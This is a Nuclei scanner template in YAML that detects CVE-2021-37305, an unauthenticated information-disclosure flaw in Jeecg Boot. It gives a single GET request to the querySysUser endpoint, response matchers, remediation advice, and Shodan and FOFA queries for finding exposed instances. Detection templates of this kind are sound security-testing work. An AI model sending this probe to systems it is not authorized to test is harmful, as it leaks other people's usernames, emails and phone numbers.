56 lines
1.6 KiB
YAML
56 lines
1.6 KiB
YAML
id: CVE-2021-37305
|
|
|
|
info:
|
|
name: Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure
|
|
author: ritikchaddha
|
|
severity: high
|
|
description: |
|
|
Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.
|
|
remediation: |
|
|
Upgrade Jeecg Boot to version 2.4.6 or later to fix the vulnerability.
|
|
reference:
|
|
- https://github.com/jeecgboot/jeecg-boot/issues/2794
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-37305
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2021-37305
|
|
cwe-id: CWE-732
|
|
epss-score: 0.00278
|
|
epss-percentile: 0.64767
|
|
cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: jeecg
|
|
product: jeecg
|
|
shodan-query: title:"Jeecg-Boot"
|
|
fofa-query: title="JeecgBoot 企业级低代码平台"
|
|
tags: cve,cve2021,jeecg,exposure
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'username":"admin'
|
|
- 'success":true'
|
|
- 'result":{'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- application/json
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100fbd01d5b8c4b3ec5b1fa8ba376b93a5f769ef0b36283d785cbf1623c0c080fc302203cd90e4ed6cd96ce16aa6a1755850678b4c0b5ec173d15bee5464bd571c99ffb:922c64590222798bb761d5b6d8e72950
|